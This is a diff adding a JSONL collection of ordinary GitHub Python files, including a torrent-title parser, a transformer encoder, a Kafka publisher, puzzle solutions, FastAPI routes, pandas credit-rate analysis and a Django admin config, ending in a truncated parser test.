diff --git "a/2787.jsonl" "b/2787.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2787.jsonl"
@@ -0,0 +1,2387 @@
+{"seq_id":"24795860828","text":"import re\nfrom .torcategory import cutExt\n\n\ndef isFullAscii(str):\n return re.fullmatch(r'[\\x00-\\x7F]*', str, re.A)\n\n\ndef containsCJK(str):\n return re.search(r'[\\u4e00-\\u9fa5\\u3041-\\u30fc]', str)\n\n\ndef containdCJKKeyword(str):\n return re.search(r'^(.迪士尼\\b)', str)\n\n\ndef notTitle(str):\n return re.search(r'^(BDMV|1080[pi]|MOVIE|DISC|Vol)', str, re.A | re.I)\n\n\ndef cutAKA(titlestr):\n m = re.search(r'\\s(/|AKA)\\s', titlestr, re.I)\n if m:\n titlestr = titlestr.split(m.group(0))[0]\n return titlestr.strip()\n\ndef cutAKAJP(titlestr):\n m = re.search(r'(/|\\bAKA\\b)', titlestr, re.I)\n if m:\n titlestr = titlestr.split(m.group(0))[0]\n return titlestr.strip()\n\n\ndef getIndexItem(items, index):\n if index >= 0 and index < len(items):\n return items[index]\n else:\n return ''\n\ndef is0DayName(itemstr):\n # CoComelon.S03.1080p.NF.WEB-DL.DDP2.0.H.264-NPMS\n m = re.match(r'^\\w+.*\\b(BluRay|Blu-?ray|720p|1080[pi]|2160p|576i|WEB-DL|\\.DVD\\.|WEBRip|HDTV)\\b.*', itemstr, flags=re.A | re.I)\n return m\n \n\ndef getNoBracketedStr(torName, items):\n ss = torName\n for s in items:\n ss = ss.replace('[' + s + ']', '')\n ss = ss.replace('[', '')\n ss = ss.replace(']', '')\n ss = ss.strip()\n\n return ss\n\ndef cutBracketedTail(sstr):\n m = re.search(r'^\\w+.*(\\[[^]]*\\]?)', sstr)\n if m:\n sstr = sstr[:m.span(1)[0]]\n return sstr\n\n\ndef parseJpAniName(torName):\n yearstr, yearspan = parseYear(torName)\n\n items = re.findall(r'\\[([^]]*[^[]*)\\]', torName)\n\n if len(items) < 2:\n return parse0DayMovieName(torName)\n\n for s in items:\n if is0DayName(s):\n return parse0DayMovieName(s)\n\n strLeft = getNoBracketedStr(torName, items)\n if len(strLeft) > 0:\n # yearstr, titlestr = getYearStr(torName)\n titlestr = bracketToBlank(strLeft)\n return cutAKAJP(titlestr), yearstr, '', '', ''\n\n jptitles = []\n titlestrs = []\n jptitle = ''\n titlestr = ''\n for item in items:\n if re.match(r'^(BDMV|EAC|XLD|1080[pi]|MOVIE|DISC|Vol\\.?\\d+|MPEG|合集|ALBUM|SBCV|FLAC|SINGLE|V\\.A|VVCL)\\b', item, re.A | re.I):\n continue\n if re.match(r'^\\d+$', item):\n continue\n \n if containsCJK(item):\n jptitles.append(item) \n else:\n titlestrs.append(item)\n\n if len(titlestrs) > 0:\n titlestr = titlestrs[0]\n # titlestr = max(titlestrs, key=len)\n if jptitles:\n jptitle = max(jptitles, key=len)\n else:\n if jptitles:\n # jptitle = jptitles[0]\n jptitle = max(jptitles, key=len)\n titlestr = jptitle\n else:\n pass\n # raise 'Some thing Wrong'\n\n titlestr = cutBracketedTail(titlestr)\n titlestr = bracketToBlank(titlestr)\n\n return cutAKAJP(titlestr), yearstr, '', '', jptitle\n\n\ndef bracketToBlank(sstr):\n dilimers = ['(', ')', '-', '–', '_', '+']\n for dchar in dilimers:\n sstr = sstr.replace(dchar, ' ')\n return re.sub(r' +', ' ', sstr).strip()\n\ndef delimerToBlank(sstr):\n dilimers = ['[', ']', '.', '{', '}', '_', ',']\n for dchar in dilimers:\n sstr = sstr.replace(dchar, ' ')\n return sstr\n\ndef parseMovieName(torName):\n if torName.startswith('[') and torName.endswith('SP'):\n m = re.search(r'\\]([^]]*\\+.?SP)$', torName, flags=re.I)\n if m:\n namestr = torName[:m.span(1)[0]]\n return parseJpAniName(namestr)\n \n if torName.startswith('[') and torName.endswith(']'):\n return parseJpAniName(torName)\n else:\n return parse0DayMovieName(torName)\n\ndef parseSeason(sstr):\n seasonstr = ''\n seasonspan = [-1, -1]\n episodestr = ''\n\n # m1 = None\n # for 
m1 in re.finditer(r'(\\bS\\d+(-S\\d+)?)\\b', sstr, flags=re.A | re.I):\n # pass\n m1 = re.search(r'(\\bS\\d+(-S?\\d+))\\s(?!.*\\bS\\d+)', sstr, flags=re.A | re.I)\n if m1:\n seasonstr = m1.group(1)\n seasonspan = m1.span(1)\n sstr = sstr.replace(seasonstr, '')\n return seasonstr, seasonspan, episodestr\n\n # m2 = re.search(r'(\\b(S\\d+)([\\. ]?(\\d{4}[\\s\\.])?Ep?\\d+)?)\\b(?!.*S\\d+)', sstr, flags=re.A | re.I)\n m2 = re.search(r'(\\b(S\\d+)([\\. ]?(\\d{4}[\\s\\.])?Ep?\\d+)?)\\b', sstr, flags=re.A | re.I)\n if m2:\n seasonstr = m2.group(1)\n seasonspan = m2.span(1)\n if m2.group(3):\n seasonstr = m2.group(2)\n episodestr = m2.group(3)\n return seasonstr, seasonspan, episodestr\n\n # seasonsapn = mcns.span(1)\n # sstr = sstr.replace(mcns.group(1), '')\n mep = re.search(r'(Ep?\\d+(-Ep?\\d+)?)\\b', sstr, flags=re.A | re.I)\n if mep:\n seasonstr = 'S01'\n episodestr = mep.group(1)\n seasonspan = mep.span(1)\n # if mep.group(2):\n # seasonstr = mep.group(2)\n # seasonspan = mep.span(2)\n return seasonstr, seasonspan, episodestr\n\n\n mcns = re.search(r'(第?\\s*((\\d+)|([一二三四五六七八九十]))(-\\d+)?季)(\\s*第\\s*((\\d+)|([一二三四五六七八九十]))集)?', sstr, flags=re.I)\n if mcns:\n # origin_seasonstr = mcns.group(1)\n seasonspan = mcns.span(1)\n ssi = mcns.group(2)\n iss = '一二三四五六七八九'.find(ssi)\n if iss >= 0:\n ssi = str(iss+1).zfill(2)\n seasonstr = 'S' + ssi\n if mcns.group(6):\n episodestr = 'E' + mcns.group(7)\n\n return seasonstr, seasonspan, episodestr\n\n\n return seasonstr, seasonspan, episodestr\n\ndef parseYear(sstr):\n yearstr = ''\n yearspan = [-1, -1]\n m2 = re.search(\n r'\\b((19\\d{2}\\b|20\\d{2})(-19\\d{2}|-20\\d{2})?)\\b(?!.*\\b\\d{4}\\b.*)',\n sstr,\n flags=re.A | re.I)\n if m2:\n yearstr = m2.group(1)\n yearspan = m2.span(1)\n if re.search(r'[\\(\\[\\{]' + yearstr+r'\\b', sstr):\n # sstr = sstr[:yearspan[0] - 1]\n yearspan = [yearspan[0]-1, yearspan[1]+1]\n # elif re.search(r'\\w.*' + yearstr+r'\\b', sstr):\n # sstr = sstr[:yearspan[0]]\n\n return yearstr, yearspan\n\ndef cutspan(sstr, ifrom, ito):\n if (ifrom >= 0) and (len(sstr) > ito):\n sstr = sstr[0 : ifrom: ] + sstr[ito + 1 : :]\n return sstr\n\n\ndef parse0DayMovieName(torName):\n sstr = cutExt(torName)\n\n failsafeTitle = sstr\n\n sstr = re.sub(\n r'\\b((UHD)?\\s+BluRay|Blu-?ray|720p|1080[pi]|2160p|576i|WEB-DL|\\.DVD\\.|WEBRip|HDTV|Director(\\'s)?[ .]Cut|REMASTERED|LIMITED|Complete(?=[. 
-]\\d+)|SUBBED|TV Series).*$',\n '',\n sstr,\n flags=re.I)\n sstr = re.sub(r'\\[Vol.*\\]$', '', sstr, flags=re.I)\n\n sstr = re.sub(r'\\W?(IMAX|Extended Cut|\\d+CD|APE整轨)\\b.*$', '', sstr, flags=re.I)\n sstr = re.sub(r'[\\[\\(](BD\\d+|WAV\\d*|(CD\\-)?FLAC|Live|DSD\\s?\\d*)\\b.*$', '', sstr, flags=re.I)\n sstr = re.sub(r'^\\W?(BDMV|\\BDRemux|\\bCCTV\\d(HD)?|BD\\-?\\d*|[A-Z]{1,5}TV)\\W*', '', sstr, flags=re.I)\n\n sstr = re.sub(r'\\{[^\\}]*\\}.*$', '', sstr, flags=re.I)\n sstr = re.sub(r'([\\s\\.-](\\d+)?CD[\\.-]WEB|[\\s\\.-](\\d+)?CD[\\.-]FLAC|[\\s\\.-][\\[\\(\\{]FLAC[\\]\\)\\}]).*$', '', sstr, flags=re.I)\n sstr = re.sub(r'\\bFLAC\\b.*$', '', sstr, flags=re.I)\n sstr = re.sub(r'^[\\[\\(]\\d+[^\\)\\]]*[\\)\\]]', '', sstr, flags=re.I)\n\n\n sstr = re.sub(r'^\\W?CC_?\\b', '', sstr, flags=re.I)\n if sstr and sstr[-1] in ['(', '[', '{']:\n sstr = sstr[:-1]\n sstr = delimerToBlank(sstr)\n if sstr:\n failsafeTitle = sstr\n\n seasonstr, seasonspan, episodestr = parseSeason(sstr)\n yearstr, yearspan = parseYear(sstr)\n if not yearstr:\n yearstr, yearspan = parseYear(torName)\n yearspan = [-1, -1]\n\n if seasonspan[0] > yearspan[0]:\n syspan = seasonspan\n systr = seasonstr\n else:\n syspan = yearspan\n systr = yearstr\n\n skipcut = False\n if syspan and syspan[0] > 1 :\n spanstrs = sstr.split(systr)\n if containdCJKKeyword(sstr[:syspan[0]]):\n sstr = sstr[syspan[1]:]\n skipcut = True\n else:\n sstr = sstr[:syspan[0]]\n\n if not skipcut:\n sstr = cutspan(sstr, seasonspan[0], seasonspan[1])\n sstr = cutspan(sstr, yearspan[0], yearspan[1])\n if sstr:\n failsafeTitle = sstr\n\n sstr = re.sub(r'(\\b剧集|\\b全\\d+集|\\b\\d+集全|\\b\\w+(影|场|念|港)版|\\b国语|\\bDis[kc]\\s*\\d*|\\bBD\\d*).*$', '', sstr, flags=re.I)\n\n if sstr and sstr[-1] in ['(', '[', '{', '(', '【']:\n sstr = sstr[:-1]\n\n # if titlestr.endswith(')'):\n # titlestr = re.sub(r'\\(.*$', '', sstr).strip()\n cntitle = ''\n if containsCJK(sstr):\n cntitle = sstr\n # m = re.search(r'^.*[^\\x00-\\x7F](S\\d+|\\s|\\.|\\d|-|\\))*\\b(?=[a-zA-Z])', sstr, flags=re.A)\n # m = re.search( r'^.*[^a-zA-Z_\\- &0-9](S\\d+|\\s|\\.|\\d|-)*\\b(?=[A-Z])', titlestr, flags=re.A)\n m = re.search(r'^.*[\\u4e00-\\u9fa5\\u3041-\\u30fc](S\\d+|\\s|\\.|\\d|-|\\))*\\b(?=[a-zA-Z])',\n sstr, flags=re.A)\n if m:\n # ['(', ')', '-', '–', '_', '+']\n cntitle = m.group(0)\n if not re.search(r'\\s[\\-\\+]\\s', cntitle):\n # if len(sstr)-len(cntitle) > 4:\n sstr = sstr.replace(cntitle, '')\n else:\n m = re.search(r'^([\\w\\s]+)\\s([\\u4e00-\\u9fa5\\u3041-\\u30fc]+)\\s*$',sstr, flags=re.A)\n if m:\n cntitle = m.group(1)\n if not re.search(r'\\s[\\-\\+]\\s', cntitle):\n sstr = sstr.replace(cntitle, '')\n cntitle = cntitle.strip()\n\n titlestr = bracketToBlank(sstr)\n titlestr = cutAKA(titlestr)\n if not containsCJK(titlestr) and len(titlestr) < 3:\n titlestr = bracketToBlank(failsafeTitle)\n\n return titlestr, yearstr, seasonstr, episodestr, cntitle\n","repo_name":"ccf-2012/seedcross","sub_path":"crseed/tortitle.py","file_name":"tortitle.py","file_ext":"py","file_size_in_byte":9667,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"18"} +{"seq_id":"3569942387","text":"import torch.nn as nn\n\n\nclass TransformerEncoder(nn.Module):\n def __init__(self, \n embedding_dim, \n num_layer=2, \n num_head=8, \n dim_feedforward=2048, \n decoder_dropout=0.1, \n activation='relu',\n num_embeddings=None, \n embeddings=None):\n\n super().__init__()\n\n encoder_layer_unit = nn.TransformerEncoderLayer(\n d_model=embedding_dim, \n nhead=num_head, \n 
dim_feedforward=dim_feedforward, \n dropout=decoder_dropout, \n activation=activation)\n \n layer_norm = nn.LayerNorm(embedding_dim)\n\n self.encoder_layer = nn.TransformerEncoder(\n encoder_layer_unit, \n num_layers=num_layer, \n norm=layer_norm)\n\n if embeddings is not None:\n self.embedding_layer = embeddings\n else:\n self.embedding_layer = nn.Embedding(\n num_embeddings=num_embeddings,\n embedding_dim=embedding_dim)\n\n return\n\n def forward(self, input_ids, attention_mask=None, **kwargs):\n \"\"\"\n Dim:\n input_ids: (B x S)\n src_key_padding_mask: (B x S)\n Bool - True: masked / False: unmasked\n \"\"\"\n out = self.embedding_layer(input_ids)\n out = self.encoder_layer(src=out.permute(1, 0, 2), src_key_padding_mask=attention_mask)\n out = out.permute(1, 0, 2) # B x S x E\n return out # B x S x E\n\n def get_embedding_layer(self):\n return self.embedding_layer\n","repo_name":"IKMLab/UASSU","sub_path":"sum_dist/models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"23953148386","text":"from apollo.events.event_handler import EventHandler\nfrom kafka import KafkaProducer\nfrom apollo.configurations import kafka_bootstrap_server\nfrom apollo.monitoring.tracing import print_publish_message\nimport json\nfrom datetime import datetime\n\ndef datetime_handler(x):\n if isinstance(x, datetime):\n return x.__str__()\n\nclass KafkaPublisher(EventHandler):\n _producer = None # KafkaProducer\n\n def __init__(self):\n self._producer = KafkaProducer(\n bootstrap_servers=kafka_bootstrap_server, \n max_in_flight_requests_per_connection=1, \n retries=2147483647, \n acks='all')\n \n def handle(self, envelope, success_callback, fail_callback):\n topic = envelope.topic\n partition_key = str.encode(envelope.partition_key) if envelope.partition_key != None else None\n json_body = json.dumps(envelope.body.to_dict(), sort_keys=True, default=datetime_handler)\n future = self._producer.send(topic, str.encode(json_body), partition_key)\n future.add_callback(success_callback, checkpoint=envelope.log_metadata)\n future.add_errback(fail_callback, checkpoint=envelope.log_metadata)","repo_name":"nghiaminhle/mysql-binlog-replication","sub_path":"src/apollo/log/binlog/reader/kafka_publisher.py","file_name":"kafka_publisher.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"70321562601","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\n\n\ndef get_total_weight(programs, index, weight=0):\n if (len(programs[index][\"children\"]) == 0):\n return weight + programs[index][\"weight\"]\n for child in programs[index][\"children\"]:\n child_index = programs.index(\n [x for x in programs if x[\"parent\"] == child][0])\n weight = get_total_weight(programs, child_index, weight)\n return weight + programs[index][\"weight\"]\n\n\ndef part1(in_data):\n programs = {}\n rexp = \"([a-z]+) \\([0-9]+\\)(?: -> ([a-z ,]+))*\"\n for line in in_data.split(\"\\n\"):\n parent, children = re.findall(rexp, line)[0]\n if (children == \"\"):\n children = []\n else:\n children = children.split(\", \")\n programs[parent] = children\n all_children = []\n for c in programs.values():\n all_children += c\n for parent, children in programs.items():\n if (len(children) > 0):\n if all(x != parent for x in all_children):\n return parent\n\n\ndef part2(in_data):\n programs = []\n rexp = 
\"([a-z]+) \\(([0-9]+)\\)(?: -> ([a-z ,]+))*\"\n for line in in_data.split(\"\\n\"):\n parent, weight, children = re.findall(rexp, line)[0]\n if (children == \"\"):\n children = []\n else:\n children = children.split(\", \")\n programs.append({\"parent\": parent,\n \"weight\": int(weight),\n \"children\": children})\n root_parent = part1(in_data)\n root_idx = programs.index(\n [x for x in programs if x[\"parent\"] == root_parent][0])\n current_program = programs[root_idx]\n while (len(current_program[\"children\"]) > 0):\n children_weights = []\n for child in current_program[\"children\"]:\n children_weights.append(get_total_weight(\n programs,\n programs.index(\n [x for x in programs if x[\"parent\"] == child][0])))\n odd_one_out = None\n for w in children_weights:\n if (children_weights.count(w) == 1):\n odd_one_out = w\n elif (children_weights.count(w) > 1):\n cur_correct_weight = w\n if (odd_one_out is None):\n for cw in children_weights:\n last_correct_weight -= cw\n return last_correct_weight\n else:\n ooo_child_idx = children_weights.index(odd_one_out)\n ooo_child_name = current_program[\"children\"][ooo_child_idx]\n cur_idx = programs.index(\n [x for x in programs if x[\"parent\"] == ooo_child_name][0])\n last_correct_weight = cur_correct_weight\n current_program = programs[cur_idx]\n\n\nwith open(\"input.txt\", \"r\") as in_file:\n in_data = in_file.read().strip()\n\n\nprint(part1(in_data))\nprint(part2(in_data))\n","repo_name":"jacopo-j/advent-of-code-2017","sub_path":"day07/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1873972628","text":"from enum import Enum\nfrom typing import List, Optional\n\nfrom fastapi import APIRouter\n\nfrom app import models\nfrom app.utils.database import es_client, mongo_cache_drop\nfrom app.utils.logging import log_args\nfrom app.utils.visjs_config import rels_limit\n\nfrom .functions import LiteratureTraitQueryProcessor, master_name\nfrom .index import ac_configs, literature_trait_index_name\n\nrouter = APIRouter()\n\n\nclass LiteratureTraitAcIndex(str, Enum):\n trait = \"trait\"\n semmed_predicate = \"semmed_predicate\"\n\n\n@router.get(\"/literature_trait\", response_model=bool)\ndef get_literature_trait(\n trait: str,\n semmed_predicate: Optional[str] = None,\n pval_threshold: float = 1e-5,\n limit: int = 500,\n overwrite: bool = False,\n) -> bool:\n \"\"\"This is the master processor. 
For actual data use sub-apis\"\"\"\n log_args(api=\"/literature_trait\", kwargs=locals())\n semmed_predicates = (\n [semmed_predicate] if semmed_predicate is not None else None\n )\n processor = LiteratureTraitQueryProcessor(\n params={\n \"trait\": trait,\n \"semmed_predicates\": semmed_predicates,\n \"pval_threshold\": pval_threshold,\n \"limit\": limit,\n }\n )\n res = processor.process_master(overwrite=overwrite)\n return res\n\n\n@router.get(\n \"/literature_trait/{endpoint}\",\n response_model=models.standard_endpoint_response,\n)\ndef get_literature_trait_endpoints(\n endpoint: models.TopicViewEndpoints,\n trait: str,\n semmed_predicate: Optional[str] = None,\n pval_threshold: float = 1e-5,\n limit: int = 500,\n rels_limit: int = rels_limit,\n overwrite: bool = False,\n):\n log_args(api=f\"/literature_trait/{endpoint.value}\", kwargs=locals())\n semmed_predicates = (\n [semmed_predicate] if semmed_predicate is not None else None\n )\n processor = LiteratureTraitQueryProcessor(\n params={\n \"trait\": trait,\n \"semmed_predicates\": semmed_predicates,\n \"pval_threshold\": pval_threshold,\n \"limit\": limit,\n }\n )\n res = None\n if endpoint.value == \"table\":\n res = processor.get_table_data(overwrite=overwrite)\n elif endpoint.value == \"network-plot\":\n res = processor.get_network_plot_data(\n rels_limit=rels_limit, overwrite=overwrite\n )\n elif endpoint.value == \"query\":\n res = processor.get_query_data(overwrite=overwrite)\n elif endpoint.value == \"query-diagram\":\n res = processor.get_query_diagram_data()\n return res\n\n\n@router.get(\"/literature_trait/cache/drop\", response_model=bool)\ndef get_literature_trait_cache_drop() -> bool:\n return mongo_cache_drop(master_name=master_name)\n\n\n@router.get(\"/literature_trait/ac/index\", response_model=bool)\ndef get_literature_trait_ac_index(overwrite: bool = False) -> bool:\n log_args(api=\"/literature_trait/ac/index\", kwargs=locals())\n return literature_trait_index_name(overwrite=overwrite)\n\n\n@router.get(\"/literature_trait/ac/{name}\", response_model=List[str])\ndef get_literature_trait_ac(\n name: LiteratureTraitAcIndex, query: str, size: int = 20\n) -> List[str]:\n log_args(api=f\"/literature_trait/ac/{name}\", kwargs=locals())\n ac_index = ac_configs[name.value]\n if not es_client.indices.exists(index=ac_index):\n get_literature_trait_ac_index()\n res = ac_configs[name][\"query_fn\"](\n query=query,\n index_name=ac_configs[name][\"index_name\"],\n es_client=es_client,\n size=size,\n )\n return res\n","repo_name":"MRCIEU/epigraphdb_web","sub_path":"backend/app/apis/topic_views/literature_trait/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"16133095115","text":"\nimport pandas as pd\nimport numpy as np\n\n#leemos los datos\ndetasa = pd.read_csv('Detalle_Tasa.csv')\ntipoen = pd.read_csv('Tipo_entidad.csv')\nenti = pd.read_csv('Entidades.csv')\ntipocred = pd.read_csv('Tipo_Credito.csv')\nplazos = pd.read_csv('Plazos.csv')\n\n\ndetasa.head()\ntipoen.head()\nenti.head()\ntipocred.head()\nplazos.head()\n\n# version rpta 1\n\ndf = detasa[['Id_entidad_financiera', 'Nombre_Tipo_Entidad', 'cod_sub_tipo', '(8)Tasa_efectiva_promedio_ponderada']]\ndf = df.sort_values(by=['(8)Tasa_efectiva_promedio_ponderada'], ascending=False).head(5)\ndf = df.sort_values(by=['Nombre_Tipo_Entidad', 'Id_entidad_financiera', 'cod_sub_tipo'])\n\n\n# esto era para hallar los 5 con mayor tasa de cada 
clasificacion\n#df = df.groupby(['Id_entidad_financiera','Nombre_Tipo_Entidad', 'cod_sub_tipo']).head(5)\n\n\ndf = df.merge(enti, how='left', on='Id_entidad_financiera') \n\ntipe = tipocred[['cod_sub_tipo', 'descripcion_tipo' ]]\ndf = df.merge(tipe, how='left', on='cod_sub_tipo') \n\ndf\n\n\n# Hasta ahi va el punto 1\n\n\ndk = detasa[['Id_entidad_financiera', 'Nombre_Tipo_Entidad', 'cod_sub_tipo', '(8)Tasa_efectiva_promedio_ponderada', '(10)Montos_desembolsados', '(11)Número_de_créditos_desembolsados']]\ndk = dk.merge(tipe, how='left', on='cod_sub_tipo') \ndk1 = dk.groupby(['Nombre_Tipo_Entidad', 'descripcion_tipo' ]).agg({'(8)Tasa_efectiva_promedio_ponderada':'mean', '(10)Montos_desembolsados':'sum', '(11)Número_de_créditos_desembolsados':'sum'})\n\n\ndk1\n\n# Hasta aqui va el punto 2\n\n\ndetasa['Fecha_Corte'] = pd.to_datetime(detasa['Fecha_Corte'])\ndetasaoct = detasa[ detasa['Fecha_Corte'].dt.month == 10]\n\n\n#a\ndk2 = detasaoct.groupby(['(3)Tamaño_de_empresa' ]).agg({'(8)Tasa_efectiva_promedio_ponderada':'mean', '(10)Montos_desembolsados':'sum'})\n\ndk2\n\n#b\ndk3 = detasaoct[detasaoct['(1)Tipo_de_persona']=='Natural']\n\ndk3 = dk3.groupby(['(6) Producto de crédito' ]).agg({'(8)Tasa_efectiva_promedio_ponderada':'mean', '(10)Montos_desembolsados':'sum'})\n\ndk3\n\n\n#c\n\ndetasaoct.groupby(['(7) Plazo de crédito' ])['(8)Tasa_efectiva_promedio_ponderada'].agg(['mean','count'])\n\n#d\n#solo estan los del mes oct\ndetasaoct.groupby(['(2)Sexo', '(5)Tipo_de_garantía' ]).agg({'(10)Montos_desembolsados':'sum', '(11)Número_de_créditos_desembolsados':'sum'})\n\n\n# Hasta aqui va el punto 3\n\n\n\n\n\ncasi1[['Fecha_Corte', 'Nombre_Tipo_Entidad', ]]\n\ncasi1 = detasa.merge(tipoen, how='left', on='Nombre_Tipo_Entidad') \ncasi2 = casi1.merge(enti, how='left', on='Id_entidad_financiera')\nplazos = plazos.rename(columns = {'Plazo_credito':'(7) Plazo de crédito'})\ncasi3 = casi2.merge(plazos, how='left', on='(7) Plazo de crédito')\nfinal = casi3.groupby(['Fecha_Corte', 'Tipo_Entidad', 'Nombre_Tipo_Entidad', 'Id_entidad_financiera', 'Entidad_financiera', '(1)Tipo_de_persona', '(3)Tamaño_de_empresa', 'Cod_Plazo', '(7) Plazo de crédito' ]).agg( {'(9)Margen_adicional_a_la_variación_para_créditos_en_UVR':['max', 'min'], '(8)Tasa_efectiva_promedio_ponderada': ['mean','max', 'min'], '(10)Montos_desembolsados': ['sum', 'min', 'max'], '(11)Número_de_créditos_desembolsados':'sum'})\n\nfinal\n\n\n\n# Hasta aqi el punto 4\n\n\n\n\n\n","repo_name":"juankaz1/itau_linares","sub_path":"itau_Linares.py","file_name":"itau_Linares.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70364328040","text":"import apache_couchdb.couch_database as db\nimport apache_couchdb.couchdb_parameters as cp\n\nimport preprocessing.preprocessing_parameters as pp\n\nfrom sklearn import cross_validation\nfrom sklearn.cross_validation import LabelShuffleSplit\nfrom sklearn.cross_validation import StratifiedShuffleSplit\n\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nfrom data_representation import dtm_provider\nimport data_representation.dataset_spliter as ds\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nimport operator\n\ndef testClassifier():\n \n min_df=0.00003125\n \n dataset_document_name = ds.DEFAULT_DATASET_DOCUMENT_NAME\n \n #training part of dataset\n dataset_name_train=ds.DEFAULT_TRAININGSET_NAME\n #testing part of dataset\n dataset_name_test=ds.DEFAULT_TESTSET_NAME\n \n for document_fields in 
dtm_provider.DEFAULT_ALL_DOCUMENT_FIELDS:\n \n #used to retrieve correct document and fields\n used_fields = dtm_provider.retrieveValueForUsedFields(document_fields)\n \n #get the dtm for train\n document_train = dtm_provider.getDatasetContentDocumentFromDatabase(\n dataset_document_name, dataset_name_train, \n used_fields)\n \n document_test = dtm_provider.getDatasetContentDocumentFromDatabase(\n dataset_document_name, dataset_name_test, \n used_fields)\n \n t_vectorizer = TfidfVectorizer(analyzer='word',stop_words='english', \n min_df=min_df)\n \n document_train_content = document_train[dtm_provider.DSCD_FIELD_CONTENT]\n \n X_train_tfidf = t_vectorizer.fit_transform(document_train_content)\n targets_train = dtm_provider.buildTargetsFromDatasetContentDocument(document_train)\n \n \"\"\"printDetails(X_train_tfidf)\n printDetails(targets_train)\n print()\"\"\"\n \n document_test_content = document_train[dtm_provider.DSCD_FIELD_CONTENT]\n \n X_test_tfidf = t_vectorizer.transform(document_test_content)\n targets_test = dtm_provider.buildTargetsFromDatasetContentDocument(document_test)\n \n \"\"\"printDetails(X_test_tfidf)\n printDetails(targets_test)\n print()\n print()\"\"\"\n \n \n \"\"\"dtm_train, targets_train = \\\n dtm_provider.buildDTMAndTargetsOfDatasetContentDocument(\n document_train,t_vectorizer)\"\"\"\n \n #t_vectorizer = TfidfVectorizer(analyzer='word',min_df=0)\n \n \"\"\"dtm_test, targets_test = \\\n dtm_provider.buildDTMAndTargetsOfDatasetContentDocument(\n document_test,t_vectorizer)\"\"\"\n\n \n \n \ndef perform_train_test_split(db_name=ds.DEFAULT_DB_NAME,\n train_size=ds.DEFAULT_TRAININGSET_SIZE):\n \n \"\"\"\n Get all document_ids of given database and split's it according to given\n train_size.\n The tricky part is that we n\n \n :param db_name: Name of database to split documents (default DEFAULT_DB_NAME)\n :param train_size: Size in percentage [0,1] of the training set.\n :return splitted_dataset - List of lists \n [[DEFAULT_DATASET_LIST_INDEX_TRAINING], \n [DEFAULT_DATASET_LIST_INDEX_TEST]]\n \"\"\"\n \n database = db.couch_database(db_name)\n all_docs = database.getAllDocumentsFromDatabase()\n \n doc_ids_list = []\n all_tag_list = []\n \n i = 0\n \n for row in all_docs.rows:\n \n document = row.doc\n #append the document id to doc_ids_list\n doc_ids_list.append(document[cp.COUCHDB_DOCUMENT_FIELD_ID])\n \n tag_list = []\n \n #if document has tags than split and add them\n if pp.STACKEXCHANGE_TAGS_COLUM in document.keys():\n \n document_tags = document[pp.STACKEXCHANGE_TAGS_COLUM]\n \n tags_list = document_tags.split(sep=dtm_provider.TAG_SPLIT_separator)\n \n for tag in tags_list:\n \n #remove the closing tag (last item)\n tag_list.append(tag[:-1])\n #append the list of document tags to all_tag_list \n all_tag_list.append(tag_list)\n \n i += 1\n \n if i > 10000:\n break\n \n mlb = MultiLabelBinarizer()\n tags_encoded = mlb.fit_transform(all_tag_list)\n\n \n print(len(doc_ids_list))\n \n splitted_dataset = cross_validation.train_test_split(doc_ids_list,tags_encoded,\n train_size=0.8, random_state=42, \n stratify=tags_encoded)\n \ndef printDetails(dtm):\n \n print(dtm.shape)\n \ndef printDetailsDocument(document):\n \n print(document['_id'])\n 
\n#perform_train_test_split()\n\ntestClassifier()","repo_name":"davcem/stackexchange_text_classification","sub_path":"classification/classifier_inspect_splits.py","file_name":"classifier_inspect_splits.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21876379708","text":"# https://uva.onlinejudge.org/index.php?option=onlinejudge&page=show_problem&problem=349\r\n\r\nwhile True:\r\n try:\r\n step, mod = [int(x) for x in input().split(' ')]\r\n listOfPossibleOutcomes = []\r\n seed = 0\r\n for i in range(mod):\r\n if i != 0:\r\n seed = listOfPossibleOutcomes[i-1]\r\n listOfPossibleOutcomes.append((seed+step) % mod)\r\n if 0 in listOfPossibleOutcomes and mod-1 in listOfPossibleOutcomes:\r\n print(str(step).rjust(10), str(mod).rjust(9), ' ', 'Good Choice')\r\n else:\r\n print(str(step).rjust(10), str(mod).rjust(9), ' ', 'Bad Choice')\r\n except:\r\n break\r\n","repo_name":"MannParutthi/CompetitiveProgramming","sub_path":"408UniformGenerator.py","file_name":"408UniformGenerator.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11325704584","text":"from django.contrib import admin\n\nfrom .models import Article\n\n\n@admin.register(Article)\nclass ArticleAdmin(admin.ModelAdmin):\n list_display = ('art_author', 'art_title', 'art_body', 'article_label', 'art_created_time')\n list_filter = ('art_author', 'article_label')\n search_fields = ('art_author', 'art_title', 'article_label')\n fieldsets = (\n ('文章信息', {\n 'fields': (\n ('article_label', 'art_author'),\n )\n }),\n ('文章内容', {\n 'fields': (\n ('art_title', 'art_body')\n )\n }),\n )\n","repo_name":"stayhungry134/chuangxue","sub_path":"article/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11175484391","text":"from ..dojo_test_case import DojoTestCase, get_unit_tests_path\r\nfrom dojo.tools.xanitizer.parser import 